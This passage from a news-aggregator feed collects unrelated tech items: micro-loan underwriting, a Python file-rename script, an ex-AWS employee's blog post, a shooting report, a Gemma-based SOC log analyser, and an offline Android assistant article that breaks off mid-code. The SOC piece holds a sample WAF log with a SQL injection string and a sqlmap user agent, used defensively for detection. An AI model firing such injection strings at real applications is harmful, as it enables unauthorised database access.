When evaluating urgent small-ticket applications, the underwriting service surfaces contextual eligibility directly, so a user who arrives with a query like "I need 1000 rupees loan urgently" can proceed without extra steps.
Risk scoring combines bureau data (CIBIL, Experian) where available with alternate signals. A typical model might assign weights: 35% to repayment history proxies, 25% to income stability from cashflow analysis, 20% to device and behavioral signals, and 20% to macroeconomic factors. Thresholds adjust dynamically based on portfolio performance using multi-armed bandit algorithms.
Explainability remains critical. SHAP values generate human-readable reasons for each decision, stored alongside the application for regulatory audits. If the composite score exceeds 650 (on a custom 300-900 scale), the application moves to approval. For ₹1,000 loans, approval rates often exceed 65% due to lower exposure.
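As a worked example of the weighting and threshold described above, the sketch below combines four normalized signals into a score on the 300-900 scale. The linear mapping from a weighted sum to that scale and the signal names are assumptions for illustration; the text does not say how the ensemble output is actually calibrated.

```python
# Weights quoted in the text; each signal is assumed to be normalized to [0, 1].
WEIGHTS = {
    "repayment_history": 0.35,
    "income_stability": 0.25,
    "device_behavior": 0.20,
    "macro": 0.20,
}
SCALE_MIN, SCALE_MAX = 300, 900
APPROVAL_THRESHOLD = 650


def composite_score(signals):
    """Map the weighted sum of signals linearly onto the 300-900 scale."""
    weighted = sum(WEIGHTS[name] * signals[name] for name in WEIGHTS)
    return SCALE_MIN + (SCALE_MAX - SCALE_MIN) * weighted


def is_approved(signals):
    """Approve when the composite score exceeds the threshold."""
    return composite_score(signals) > APPROVAL_THRESHOLD
```

Under this mapping an applicant needs a weighted signal above roughly 0.58 to clear the 650 threshold.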
Upon approval, the system generates a digital loan agreement using DocuSign APIs or in-house eSign solutions compliant with IT Act. The borrower electronically signs via Aadhaar-based eSign.
Disbursal orchestration uses RazorpayX, Cashfree, or direct NPCI API integrations for IMPS/NEFT. Account validation precedes transfer through penny drop verification. For sub-₹2,000 loans, UPI credit via linked accounts enables near-instantaneous crediting, often completing under 15 seconds post-approval.
The repayment engine schedules EMIs or bullet repayments through UPI mandates or auto-debit. Delinquency detection triggers early warning systems that analyze real-time cashflow for restructuring offers.
Production deployments handle 50,000+ concurrent applications during peak hours using auto-scaling groups and circuit breakers (Resilience4j). Prometheus and Grafana monitor end-to-end latency, with OpenTelemetry tracing across services. Chaos engineering regularly validates resilience against database failures or third-party API degradations.
Data privacy follows differential privacy techniques for aggregate analytics while maintaining strict isolation. All models undergo periodic bias audits and retraining on fresh data windows.
Teams building these systems should prioritize consent management platforms that support granular permissions. Choose languages wisely: Go for low-latency services, Python for ML components. Infrastructure-as-code via Terraform ensures repeatable environments across regions.
Security demands zero-trust architecture with mTLS between services and regular penetration testing. Cost optimization comes from serverless components for sporadic workloads while keeping core decision engines warm.
The evolution of instant micro-loans demonstrates how thoughtful data pipeline design, combined with regulatory-first automation, creates accessible credit products. For developers architecting similar platforms, focus on composable services that can adapt to evolving RBI guidelines and emerging data sources like Open Credit Enablement Network (OCEN).
This architecture not only processes a ₹1,000 loan end-to-end within minutes but does so with transparency, fairness, and scale. The technical patterns (event sourcing, feature stores, and API-first compliance) extend beyond lending into any domain requiring real-time risk decisions.

---
## Bulk Rename Files from the Command Line with Python

> Published: 2026-05-24 04:54:07+00:00
> Source: https://dev.to/nportercodes/bulk-rename-files-from-the-command-line-with-python-3ld8
> wpnews: https://wpnews.pro/news/bulk-rename-files-from-the-command-line-with-python

This article explains how to rename multiple files from the command line using a simple Python script. The provided script uses the `os` and `sys` modules to iterate through files in a directory, adding a specified prefix to each filename. It also mentions a more advanced tool called Bulk Renamer Pro, which is built with Python 3 and has no external dependencies.

# Bulk Rename Files from the Command Line with Python

Renaming hundreds of files manually is tedious. Here is how to do it with a simple Python script.

## The Problem

You have a folder full of photos and you need to add prefixes, change extensions, or convert case.

## Quick Solution

``` python
import os
import sys


def rename_files(directory, prefix=""):
    """Add `prefix` to the name of every regular file in `directory`."""
    for f in os.listdir(directory):
        fp = os.path.join(directory, f)
        if not os.path.isfile(fp):
            continue  # skip subdirectories
        name, ext = os.path.splitext(f)
        new_path = os.path.join(directory, prefix + name + ext)
        print(f"{f} -> {os.path.basename(new_path)}")
        if new_path != fp:
            os.rename(fp, new_path)  # perform the actual rename


if __name__ == "__main__":
    rename_files(sys.argv[1], sys.argv[2] if len(sys.argv) > 2 else "")
```

Usage:

``` shell
python renamer.py ./photos vacation_
```

This adds a prefix to every file in the directory.

## Advanced Features

The full CLI tool (Bulk Renamer Pro) adds:

- Regex find-and-replace
- Case conversion
- Auto-numbering
- Extension filtering
- Recursive scanning
- Safe dry-run mode
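To give a feel for how a few of these features fit together, here is a minimal sketch of regex find-and-replace with extension filtering and a dry-run switch. It is not Bulk Renamer Pro's code; the function names and parameters are made up for illustration.

```python
import os
import re


def plan_renames(directory, pattern, replacement, extensions=None):
    """Return (old_name, new_name) pairs without touching the filesystem."""
    plan = []
    for name in sorted(os.listdir(directory)):
        if not os.path.isfile(os.path.join(directory, name)):
            continue
        stem, ext = os.path.splitext(name)
        if extensions and ext.lower() not in extensions:
            continue  # extension filter
        new_name = re.sub(pattern, replacement, stem) + ext
        if new_name != name:
            plan.append((name, new_name))
    return plan


def apply_renames(directory, plan, dry_run=True):
    """Print every planned rename; only rename when dry_run is False."""
    for old, new in plan:
        print(f"{old} -> {new}")
        if not dry_run:
            os.rename(os.path.join(directory, old), os.path.join(directory, new))
```

Splitting planning from applying means the dry run prints exactly the list that a real run would act on.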

## Why CLI?

- Fast: one command, hundreds of files
- Repeatable: same result every time
- Scriptable: chain with other commands

Built with Python 3. No external dependencies.

---
## Amazon Web Services – Four Years and Out

> Published: 2026-05-24 04:51:22+00:00
> Source: https://www.adventuresinoss.com/aws-four-years/
> wpnews: https://wpnews.pro/news/amazon-web-services-four-years-and-out

After four years at Amazon Web Services (AWS), the author is being fired and expresses relief, citing significant changes to the company since 2022. The primary reasons for their unhappiness were a major organizational shift—specifically the promotion of their supportive manager, David Nalley—and an intensified, desperate focus on Generative AI. The author argues that AWS now treats employees as "fungible" (replaceable) and has lost its customer focus by prioritizing rapid AI content creation over genuine customer needs.

Today marks four years since I joined AWS. My last day will be Friday.
I have to say being fired from AWS is actually a relief. There have been a lot of changes to the company since I joined in 2022, and the company I wanted to work for is no longer the same company.
This past year, while I was doing my best to make AWS play nice in open source communities, there were two main drivers making me unhappy with my job: organizational change and the acceleration of the focus on Generative AI.
The organizational change came in the form of the man who hired me, David Nalley. I was skeptical about joining AWS, especially since I work in open source, but David convinced me that his team, OSSM (Open Source Strategy and Marketing), was dedicated to making AWS a better citizen in open source communities.
Amazon has a really odd viewpoint when it comes to the people who work there. They view almost all employees as “fungible”.
Now the first time I had ever heard the term “fungible” was in reference to non-fungible tokens (NFTs), but it basically means “replaceable”. Amazon built a huge retail business on processes that could take someone who was relatively healthy and relatively intelligent, and turn them into a productive fulfillment center employee in a couple of weeks. While that may work for a shipping business, it doesn’t translate all that well to information technology, since so much of being successful in that business relies on institutional knowledge that must be earned over time.
It also assumes that there is a limitless supply of people with the required skills, and a willingness to work for Amazon.
In any case, during the interview process David called me “non-fungible” (which still sounds dirty in my mind but did make me proud) and I got the job.
While my official role was to act as a liaison between AWS and customers who were commercial open source companies, I simplified that to mean bring a human face to a huge, faceless corporation.
David was a very good manager. In fact, he is in the running to be the best manager I’ve ever had, although that title still belongs to a man named Jay Clapsadle (who is long since retired). He has an innate understanding of how AWS works, and he would always nudge me into those situations where my unique but limited talents would be put to good use.
Well, last year David, being very good at his job, got promoted to run the entire AWS Developer Experience organization. OSSM is a part of it, but I no longer interacted with him in a meaningful way. My “David Time” went almost to zero.
Also, last year the focus at AWS turned fully and almost desperately toward GenAI.
This post is already too long so I won’t pull out all of the examples I was going to bring up at this point in the narrative, but we started being driven to use as much AI as possible. People were writing things like “I use AI to summarize my email!”. I mentally responded to that with “why don’t we just write better emails?”. And one that really bothered me was “I used one prompt to create my conference presentation!”
In the modern economy, the most valuable commodity is attention. I really appreciate the attention my three readers give to my posts, even when I lose them halfway through. I love giving conference talks and I spend a considerable amount of time creating them, and when someone still wants to speak but doesn’t want to put in the work, it makes me angry. Seriously, why do it?
It has gotten better, but I used to see slides with AI-generated images full of unintelligible writing or misspelled words, and the speaker left them in anyway. “Good enough” is not customer obsession.
In this whole pivot to GenAI, AWS has lost its focus on the customer. Instead of working backwards from a genuine customer need, the goal seems to be to create as many things as fast as possible, throw them into the world and see which ones gain traction, whether or not they serve a real need.
There is this push to use AI to create content which will ultimately be consumed by AI, and we’ve lost the human being in the process.
When AWS first introduced a viable cloud to the world, it was amazing. Back in the 1990s when you wanted to implement an enterprise software solution, you first had to take a guess at what computing power you would need. Next, you would have to order hardware from companies like Sun Microsystems or Dell and that could take weeks if not months to be delivered. It would then need to be racked, powered and provisioned, and then you were screwed if you happened to undersize it or criticized if you spent too much and oversized it.
The cloud solved those problems, and AWS set the standard with services such as S3, EC2, RDS, etc.
Go to re:Invent these days and try to find a session on those tools. Even when you can, AI will still dominate the presentation.
This whole thing made me question my role. My personal goal is to make AWS the default choice for running open source workloads, but what does that mean when you can simply “vibe code” the same functionality, bypassing the license?
The customer focus at AWS has also changed. Instead of appealing to those people focused on the infrastructure required to build stable and feature-rich applications, it has become abstracted to focus on a level above that, since the whole promise of GenAI is to make those people no longer necessary; to make those people “fungible”.
Last year the achievement I am most proud of involved getting a suspended AWS account reinstated. The financial impact to the company was negligible as this customer wasn’t a huge spender, but they are one of those people that made AWS successful in the first place.
A man in northern Africa posted that his decade-old AWS environment had been shut down with little notice and no recourse. In fact, he was told that his data had been deleted.
I reached out to him to see if I could help, but I wasn’t optimistic. If his data was gone, it was gone, but I really wanted to capture as much as I could about the experience in order to prevent others from having to go through it.
In the process of turning this person from an account number into a human being, I learned more about his situation and, while I won’t share details, losing his AWS account was just one of a long list of issues he was dealing with at the time.
Long story short, I was able to get his resources restored. All I did was manage to poke the right bear and the support team did the rest of the work (and they were amazing). He wrote up a nice post that mentioned me, but the main point of it was that this issue shouldn’t have happened in the first place.
No one in senior management seemed to care once the case was closed, but that attitude was not the norm, especially among the rank and file. When that post hit, I had a number of random Amazonians ping me on Slack to thank me, some even going so far as to say I renewed their faith in the company. It was rough in that no one in leadership seemed to care that I did this.
This past year has been rough in other ways. Last October there was a mass layoff but it didn’t impact many people with whom I worked closely. The January mass layoff was much worse, and several friends I’d made at AWS were now looking for work. The stress impacted my health. I’ve gained yet another ten pounds (bringing my four year total to nearly thirty), I consistently set new high scores on the blood pressure machine, and my sleep is so disrupted I haven’t had a single good night’s sleep in weeks (I wrote most of this in a hotel room at [checks watch] 1am).
I cannot stress enough that AWS employs some amazing people, but between the reduction in force and people leaving for better companies, I’m not sure how long that can be sustained. Many good people have left on their own and others, like myself, have been told to leave.
Then there are a number of things that made me embarrassed to work at Amazon. Cory Doctorow did a long post on how Amazon creates “reverse centaurs”. No Amazonians I worked with could read that and not feel at least a little ashamed.
One thing AWS gets right is that it allows a Slack channel called #actual-aws-memes to exist. While it is heavily moderated, it is a place for people to blow off steam by posting memes about life at AWS. I posted my first (and obviously last) one this past week.
Note that I don’t think that meme was why I got fired, and I want to stress that in my four years at AWS I was never asked to do anything I felt was unethical, much less illegal. But there seems to be a level in this country, and the world in general, where following the law becomes optional.
I didn’t know what my future was at AWS, so being forced to leave is actually a relief. After attending GrafanaCon this year, I really want to get back to my open source roots.
Open source has always been, at least to me, about putting technological power and control into the hands of the user and not the vendor. How will that play out in GenAI, when every state of the art model can only be accessed by API? Even if you want to try to run models locally, who can afford the hardware?
And what do you do when your job is to be a human being in a world of AI?

---
## Special Report: Secret Service kill man who opened fire outside of White House

> Published: 2026-05-24 04:50:14+00:00
> Source: https://www.nbcnews.com/video/special-report-secret-service-kill-man-who-opened-fire-outside-of-white-house-263868485559
> wpnews: https://wpnews.pro/news/special-report-secret-service-kill-man-who-opened-fire-outside-of-white-house

According to the article, the U.S. Secret Service shot and killed a man who opened fire at a security checkpoint outside the White House, leading to a brief lockdown of the premises. The incident, which occurred on May 24, 2026, involved an exchange of gunfire between the suspect and Secret Service agents. NBC News correspondents provided the latest details on the shooting.

The U.S. Secret Service shot and killed a person who opened fire at a security checkpoint in an exchange of gunfire that briefly locked down the White House, officials said. NBC News correspondents have the latest on the shooting. May 24, 2026

---
## Virtual SOC Analyst

> Published: 2026-05-24 04:46:38+00:00
> Source: https://dev.to/byron_lainez/virtual-soc-analyst-4a5p
> wpnews: https://wpnews.pro/news/virtual-soc-analyst

The article describes an AI-powered Virtual SOC Analyst tool, hosted at analista.byronlainez.click, that uses Gemma 4 to rapidly analyze AWS security logs (such as CloudTrail, WAF, and Nginx) and detect threats like SQL injection in under 30 seconds. It can also identify critical architecture misconfigurations, such as an RDS database exposed in a public subnet, by analyzing uploaded screenshots of AWS architecture diagrams. The system leverages a 128K context window to correlate security events across large log files in a single pass, outputting structured threat analysis, MITRE ATT&CK mappings, and deployment-ready AWS WAF block rules.

## What I Built

**analista.byronlainez.click** is an AI-powered **Virtual SOC (Security Operations Center) Analyst** that:

- Ingests raw cloud security logs (AWS CloudTrail, WAF, Nginx) with no size limits
- Automatically maps every detected threat to **MITRE ATT&CK** and **OWASP Top 10**
- Generates **production-ready AWS WAF block rules** and Terraform HCL, ready to copy-paste and deploy
- Analyzes **screenshots of dashboards and architecture diagrams** using Gemma 4's multimodal vision
- Runs a **fully private local mode** where Gemma 4 4B executes inside the browser via WebLLM, so your logs never leave your machine

### The Problem It Solves

If you manage AWS infrastructure, you know the pain: **CloudTrail + WAF + Nginx logs grow exponentially**. A production environment generates tens of thousands of security events per hour. When an incident happens:

- Junior SOC analysts hit **alert fatigue** within 30 minutes of a real incident
- Correlating events separated in time (a 2:00 AM port scan and a 5:00 AM SQL injection from the same IP) requires expensive SIEM tooling or hours of manual grep queries
- Writing a WAF block rule takes 10–15 minutes — time that an active attacker is already exploiting

**This tool cuts all of that to under 30 seconds.**

The real enemy in cybersecurity is often not the attacker — it is the sheer **volume of data** that buries the signal inside the noise. Gemma 4 solves this.

## Demo

**Unfortunately, due to the API limit, I couldn't record the video, but I'm leaving the link so you can try it. In the settings, if you don't see the option to enter the API, reduce your window resolution.**

🌐 **Live app:** [analista.byronlainez.click](https://analista.byronlainez.click/)

### End-to-End Example

I fed the tool a raw AWS WAF log containing a SQL injection attempt from an automated scanner:

**Input — raw WAF log:**

```
{
  "timestamp": "2026-05-21T02:14:33Z",
  "action": "ALLOW",
  "httpRequest": {
    "uri": "/api/users?id=1' OR '1'='1",
    "clientIp": "45.33.32.156",
    "country": "RU",
    "headers": [
      { "name": "User-Agent", "value": "sqlmap/1.7" }
    ]
  }
}
```

**Gemma 4 analysis — returned in under 8 seconds:**

```
🚨 THREAT DETECTED — HIGH CONFIDENCE

MITRE Tactic:    Initial Access
MITRE Technique: T1190 — Exploit Public-Facing Application
OWASP Category:  A03:2021 — Injection (SQL Injection)
Attacker IP:     45.33.32.156
Tool Signature:  sqlmap/1.7 (automated SQL injection scanner)

Timeline correlation: This IP performed ICMP reconnaissance
at 01:47 UTC before switching to active exploitation.

Recommended Action: BLOCK immediately and audit all requests
from this source in the last 24 hours for lateral movement.
```

**Auto-generated AWS WAF block rule — ready to deploy:**

```
{
  "Name": "BlockMaliciousIPsGemma",
  "Priority": 10,
  "Statement": {
    "IPSetReferenceStatement": {
      "ARN": "arn:aws:wafv2:us-east-1:123456789012:regional/ipset/MaliciousIPs/a1b2c3d4"
    }
  },
  "Action": { "Block": {} },
  "VisibilityConfig": {
    "SampledRequestsEnabled": true,
    "CloudWatchMetricsEnabled": true,
    "MetricName": "BlockMaliciousIPsGemmaMetric"
  }
}
```

Swap in the ARN of your own IP set, then paste this into the AWS Console or deploy it via the CLI.

### Visual Triage — Multimodal in Action

I uploaded a screenshot of an AWS architecture diagram where a database was sitting in a public subnet. Gemma 4 flagged it without any additional prompting:

```
⚠️ ARCHITECTURE MISCONFIGURATION DETECTED

Finding:     RDS instance appears exposed in a public subnet
Risk Level:  CRITICAL — direct internet-reachable database
MITRE Ref:   T1190, T1078 (Valid Accounts via exposed DB port)

Remediation:
1. Move RDS to a private subnet immediately
2. Configure NAT Gateway for outbound-only connectivity
3. Enable RDS encryption at rest (KMS) if not already active
4. Audit Security Group rules — port 3306/5432 must not be 0.0.0.0/0
```

This second layer of analysis — visual + log correlation — is something no purely text-based model can replicate.

## Code

🔗 **Repository:** [github.com/Byronsasvin/bals-analyst-v2](https://github.com/Byronsasvin/bals-analyst-v2)

### Core Architecture

The system is built around a **structured prompt engineering core** that leverages Gemma 4's 128K context window to correlate security events across massive log files in a single inference pass — no chunking, no summarization loss.

**SOC analyst system prompt (simplified):**

``` python
import json

SYSTEM_PROMPT = """
You are a senior SOC analyst with expertise in AWS security,
MITRE ATT&CK framework, and OWASP Top 10.

Analyze the provided security logs and return a structured JSON with:
  - threat_detected: boolean
  - confidence: HIGH | MEDIUM | LOW
  - mitre_tactic: string
  - mitre_technique: string (include T-number)
  - owasp_category: string or null
  - attacker_ips: array of strings
  - attack_timeline: chronologically ordered events
  - waf_rule_json: complete AWS WAF rule object, deployment-ready
  - remediation_steps: prioritized action list

If image input is provided, also analyze for:
  - Architecture misconfigurations (public subnets, open ports)
  - Visual anomalies in traffic/metric charts
"""

def analyze(log_content: str, screenshot=None) -> dict:
    messages = [{"role": "user", "content": []}]

    if screenshot:
        # Gemma 4 multimodal: image tokens must precede text tokens
        messages[0]["content"].append({
            "type": "image",
            "image": screenshot
        })

    messages[0]["content"].append({
        "type": "text",
        "text": f"{SYSTEM_PROMPT}\n\nLogs to analyze:\n{log_content}"
    })

    # gemma4_client is assumed to be an OpenAI-style chat client created elsewhere.
    response = gemma4_client.chat(
        messages,
        response_format={"type": "json_object"},
        max_tokens=2048,
        temperature=0.1   # Low temperature = consistent structured output
    )
    return json.loads(response.choices[0].message.content)
```

**Local edge mode — Gemma 4 4B running 100% in-browser:**

``` js
import { CreateWebWorkerMLCEngine } from "@mlc-ai/web-llm";

// Runs in a Web Worker — zero server calls, zero data leakage
const engine = await CreateWebWorkerMLCEngine(
  new Worker(new URL('./worker.js', import.meta.url), { type: 'module' }),
  "gemma-4-4b-it-q4f32_1-MLC",
  { initProgressCallback: (p) => updateProgressBar(p.progress) }
);

async function analyzeLocally(logContent) {
  const reply = await engine.chat.completions.create({
    messages: [
      { role: "system", content: SYSTEM_PROMPT },
      { role: "user",   content: logContent }
    ],
    temperature: 0.1,
    max_tokens: 2048
  });
  return JSON.parse(reply.choices[0].message.content);
}
```

After the model downloads once (~2.5 GB cached in IndexedDB), every analysis run is completely offline. **Your production logs never touch a server.**

## How I Used Gemma 4

I made a **deliberate choice to use two different Gemma 4 variants** for two distinct security scenarios. Here is the reasoning behind each decision.

### Gemma 4 27B — Deep cloud forensics (via Gemini API)

**Why 27B? The 128K context window was the decisive factor.**

I benchmarked the same log analysis task against smaller models and previous-generation LLMs. Every one of them failed in the same way: they either refused files larger than ~30K tokens, or they exhibited the classic "lost in the middle" problem — forgetting events from the beginning of the log by the time they reached the end.

With **Gemma 4 27B**, I fed a complete 72-hour CloudTrail export (~85K tokens) in a single call. It correctly identified a three-hop attack chain:

| Time | IP | Event |
|---|---|---|
| 02:14 UTC | 45.33.32.156 | ICMP sweep — passive reconnaissance |
| 03:47 UTC | 45.33.32.159 | WAF probing — fuzzing for bypasses |
| 05:22 UTC | 45.33.32.157 | Active SQL injection using `sqlmap` |

**That correlation across 3 hours and 3 rotating IPs from the same subnet would have taken a human analyst 45+ minutes to find manually.** Gemma 4 found it in one inference pass, in under 90 seconds.

This is what the 128K window actually unlocks in a security context: not just "longer documents," but **temporal correlation at scale** without losing context.
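The rotating-IP pattern in the table can also be checked deterministically, which is useful for cross-checking what the model reports. The sketch below groups events by /24 subnet using the standard `ipaddress` module; the event dictionary shape and the function names are assumptions for illustration and are not taken from the project's repository.

```python
import ipaddress
from collections import defaultdict


def group_by_subnet(events, prefix_len=24):
    """Group events by the subnet of their source IP, ordered by time."""
    groups = defaultdict(list)
    for event in events:
        network = ipaddress.ip_network(f"{event['ip']}/{prefix_len}", strict=False)
        groups[str(network)].append(event)
    for subnet_events in groups.values():
        subnet_events.sort(key=lambda e: e["time"])
    return dict(groups)


def rotating_ip_subnets(events, min_distinct_ips=2):
    """Keep only subnets where several distinct IPs were active."""
    return {
        subnet: evs
        for subnet, evs in group_by_subnet(events).items()
        if len({e["ip"] for e in evs}) >= min_distinct_ips
    }
```

Fed the three rows from the table, `rotating_ip_subnets` returns a single group for `45.33.32.0/24` containing all three events in time order.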

### Gemma 4 4B — Privacy-first local analysis (via WebLLM)

**Why 4B in the browser? Because compliance is a hard blocker for most enterprises.**

Uploading production security logs to any external API — even a secure, encrypted one — can violate:

- **GDPR** Article 28: data processor agreements and data residency requirements
- **HIPAA**: if HTTP request logs contain PHI embedded in URL parameters
- **PCI-DSS**: cardholder data potentially visible in WAF request logs

By running **Gemma 4 4B locally via WebLLM**, the sensitive data never leaves the user's machine. The model runs in a browser Web Worker with no outbound network calls after the initial model download. This makes the tool usable for banks, hospitals, and any regulated industry that would otherwise be completely blocked from using a cloud API version.

The 4B model handles single-event triage with enough accuracy for real-time alerting. Users who need deep forensic correlation across large log archives can switch to the cloud mode with a single toggle.

### Native multimodal — an unexpected force multiplier

Building the visual triage module revealed something I did not anticipate: **Gemma 4 can read AWS dashboard screenshots with the accuracy of a trained human analyst.**

Feed it a CloudWatch metrics screenshot showing a traffic anomaly, and it correctly identifies:

- The approximate time window of the spike
- Whether the pattern resembles a DDoS, a scraper bot, or a legitimate traffic surge
- Which alarms should have fired but did not — flagging monitoring gaps

This is a second analysis layer that no text-only model can replicate. It required zero extra tooling — just passing the screenshot as native image input to Gemma 4.

## From MVP to Enterprise: The Closed-Loop SOC Pipeline

This app is a working MVP. Here is how the same architecture scales to a fully automated, production-grade SecOps pipeline:

```
AWS WAF / CloudTrail
        │
        ▼
Amazon Kinesis Firehose      ← real-time event stream
        │
        ▼
Classifier Lambda             ← fast filter: normal vs suspicious
        │ (suspicious events only)
        ▼
analista.byronlainez.click API
        │
        ▼
Gemma 4 31B Dense             ← deep reasoning + timeline correlation
        │
        ▼
Generate WAF Rule JSON
        │
        ▼
Lambda → Update WAF IP Set   ← automatic block in ~200ms
        │
        ▼
Slack / Teams webhook         ← SOC team notified with full report
```
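The "Classifier Lambda" stage in the diagram is described only as a fast filter. One way such a filter could look is sketched below, using the WAF log shape from the earlier example. The scanner list, the regex and the function name are illustrative assumptions, not the project's actual rules, and a real filter would need far broader coverage.

```python
import re

# Hypothetical signatures: a few well-known scanner user agents
# and a deliberately small SQL injection pattern.
SCANNER_AGENTS = ("sqlmap", "nikto", "nmap")
SQLI_PATTERN = re.compile(r"('|%27)\s*(or|and)\s|union\s+select", re.IGNORECASE)


def is_suspicious(event):
    """Cheap pre-filter: True if the event should go on to deep analysis."""
    request = event.get("httpRequest", {})
    uri = request.get("uri", "")
    headers = {h["name"].lower(): h["value"] for h in request.get("headers", [])}
    user_agent = headers.get("user-agent", "").lower()
    if any(agent in user_agent for agent in SCANNER_AGENTS):
        return True
    return bool(SQLI_PATTERN.search(uri))
```

Keeping this stage cheap and rule-based means only a small share of traffic reaches the model.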

**What this closed-loop approach delivers:**

- **Zero-touch threat containment**: from detection to active block in under 500ms, with no human in the loop for high-confidence threats
- **Automated IAM privilege audits**: Gemma 4 31B Dense running nightly scans of all IAM policies, surfacing silent privilege escalation paths before attackers find them
- **SIEM enrichment**: structured threat reports pushed directly into Splunk, Microsoft Sentinel, or any webhook-compatible platform

That is what open-weights models like Gemma 4 make possible — and why I believe this architecture represents the future of accessible, privacy-respecting enterprise security.

Try **analista.byronlainez.click** with your own logs.

What threats did Gemma 4 find in your infrastructure? Drop your results in the comments 👇

---
## How I built a fully offline AI assistant on Android with Gemma 4 E2B

> Published: 2026-05-24 04:43:53+00:00
> Source: https://dev.to/manoj_shetty/how-i-built-a-fully-offline-ai-assistant-on-android-with-gemma-4-e2b-5a19
> wpnews: https://wpnews.pro/news/how-i-built-a-fully-offline-ai-assistant-on-android-with-gemma-4-e2b

The article describes the creation of PocketClaw, a fully offline Android AI assistant built using Google's Gemma 4 E2B model. The assistant runs entirely on-device with a 1.5 GB INT4 quantized model, enabling features like chat, voice transcription, image analysis, PDF queries, and device control (e.g., flashlight, alarms, SMS) without internet dependency. The developer built the app solo in 17 days, leveraging Flutter, MediaPipe for vision, Gecko embeddings for on-device RAG, and native Android intents for device actions.

# How I built a fully offline AI assistant on Android with Gemma 4 E2B

*This is a submission for the Gemma 4 Challenge: Build with Gemma 4.*

## What I built

PocketClaw is an Android assistant that runs entirely on your phone. You can chat with it, talk to it (press and hold the mic, it transcribes live), show it photos, hand it a PDF and ask questions about it, or tell it to turn on the flashlight, set an alarm, open the dialer, send an SMS, drop something on the calendar, search the web, or fire a notification. All of that runs on a 1.5 GB model that lives on the device.

Once the model is downloaded the first time, you can switch on airplane mode. Nothing breaks.

I built it solo, 17 days, for this challenge.

**Repo:** [github.com/ManojRakshu/pocketclaw](https://github.com/ManojRakshu/pocketclaw) (MIT)

## Why on-device and why E2B

I've been building agents on cloud LLMs for about a year and a half. Claude mostly, GPT-4 for a few things. Every agent I've put in front of users has had the same set of problems sitting behind it. Latency adds up when you're chaining calls. The cost per call gets real once you have real traffic. And the whole thing stops the second the network goes down.

Phones are interesting because they fix all three of those at once. Model lives on the device, so there's no per-call cost. No network in the loop, so latency is just silicon. And the network can disappear without anything breaking.

The thing that constrains you is RAM. A mid-range Android phone gives an app something like 1.5 to 2 GB of usable working memory before the OS starts pushing back. That's enough to rule out most of the Gemma 4 family:

- **E2B** at about 1.5 GB INT4. Fits. Has vision built in. This is what I shipped.
- E4B at about 2.5 GB. Tight on high-end phones, OOMs on lower-end ones.
- 26B MoE. Workstation.
- 31B dense. Server.

I built and tested on a OnePlus Nord CE 4 (Snapdragon 7s Gen 3, Adreno GPU, 8 GB RAM, Android 14). First-token latency is around 1 to 3 seconds for chat, around 5 for vision. Slower than cloud. But there's no network in the way.

The 1.5 GB number is worth being precise about. Full precision E2B (fp32) is roughly 20 GB. fp16 is 10. INT8 is 5. INT4 with Google's litert-lm packaging gets you down to 1.5 GB. Same precision class as what Google ships in Pixel's Gemini Nano. For phones, INT4 is the only answer that makes sense.

## How it's put together

Three layers.

**The model.** I'm using `flutter_gemma`, which wraps Google's MediaPipe LLM API and LiteRT-LM on Android. I picked it because among the Flutter plugins I evaluated, it had the most mature support for Gemma 4's vision input. There's a cost to this. The MediaPipe stack adds about 80 MB of native libraries to the APK. Lighter, text-focused alternatives (llama.cpp wrappers, etc.) can ship at 30-60 MB. My release APK is 152 MB, down from 185 after I trimmed image-generation and WebGPU runtimes via Gradle (the plugin bundles them, we never use them):

```
// android/app/build.gradle.kts
packaging {
    jniLibs {
        excludes.addAll(listOf(
            // We never generate images, only consume them.
            "**/libimagegenerator_gpu.so",
            "**/libmediapipe_tasks_vision_image_generator_jni.so",
            // WebGPU is for browsers, useless on Android.
            "**/libLiteRtWebGpuAccelerator.so",
            "**/libLiteRtTopKWebGpuSampler.so"
        ))
    }
}
```

If you don't need vision you can probably get below 80 MB by switching to a text-focused stack. I needed vision so I'm at 152.

**RAG on-device.** A second model handles embeddings. Gecko 110M, around 110 MB on disk. I went with Gecko over EmbeddingGemma 300M because Gecko is roughly 3x smaller and the retrieval quality on PDFs of a hundred pages or less was comparable. Could be different at larger corpora. The pipeline is Syncfusion for PDF extraction, my own chunker (paragraph split, merge tinies, sentence-aware sub-split for anything still over the threshold), Gecko for embedding, sqlite-vec with HNSW for the vector store. All on device.
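The chunking steps described above (paragraph split, merge tinies, sentence-aware sub-split) can be sketched roughly as follows. This is a Python illustration, not the app's Dart code; the function name and the `min_chars` / `max_chars` thresholds are assumptions chosen for the example.

```python
import re

def chunk_text(text: str, min_chars: int = 200, max_chars: int = 1200) -> list:
    """Paragraph split, merge small paragraphs, sentence-aware sub-split."""
    # 1. Split on blank lines into paragraphs.
    paragraphs = [p.strip() for p in re.split(r"\n\s*\n", text) if p.strip()]

    # 2. Fold a paragraph into the previous chunk while that chunk is still tiny.
    merged = []
    for para in paragraphs:
        if merged and len(merged[-1]) < min_chars:
            merged[-1] = merged[-1] + "\n\n" + para
        else:
            merged.append(para)

    # 3. Sub-split anything still over the threshold on sentence boundaries.
    chunks = []
    for block in merged:
        if len(block) <= max_chars:
            chunks.append(block)
            continue
        current = ""
        for sentence in re.split(r"(?<=[.!?])\s+", block):
            if current and len(current) + 1 + len(sentence) > max_chars:
                chunks.append(current)
                current = sentence
            else:
                current = f"{current} {sentence}".strip()
        if current:
            chunks.append(current)
    return chunks
```

A single sentence longer than `max_chars` is left as one oversized chunk in this sketch; a real chunker would probably need a hard character split as a last resort.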

**Device actions.** Gemma's job here is intent classification. The user types or says "set an alarm for 7:30 AM". Gemma emits a structured JSON object that identifies the tool and parameters. Dart parses it. A native Kotlin MethodChannel (`pocketclaw/device`) fires the right Android intent. Eight categories work this way. Flashlight via `CameraManager.setTorchMode`. Alarms via `AlarmClock.ACTION_SET_ALARM`. Dialer via `ACTION_DIAL`. SMS via `ACTION_SENDTO`. Calendar via `ACTION_INSERT`. Location settings panel. Web search by handing the query to the default browser. Local notifications via `NotificationManager`. Nothing in the loop touches the network. The LLM doesn't even know the network exists.
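To make the parse-and-dispatch step concrete, here is a minimal Python sketch of the idea. The JSON shape (`tool` plus `params`), the tool names, and the handler functions are all hypothetical; in the app the handlers would be MethodChannel calls into Kotlin, and the article does not show the actual schema.

```python
import json
from typing import Optional

# Hypothetical handlers standing in for the native Android intents.
def set_alarm(hour: int, minute: int) -> str:
    return f"alarm set for {hour:02d}:{minute:02d}"

def toggle_flashlight(on: bool) -> str:
    return "flashlight on" if on else "flashlight off"

TOOLS = {
    "set_alarm": set_alarm,
    "flashlight": toggle_flashlight,
}

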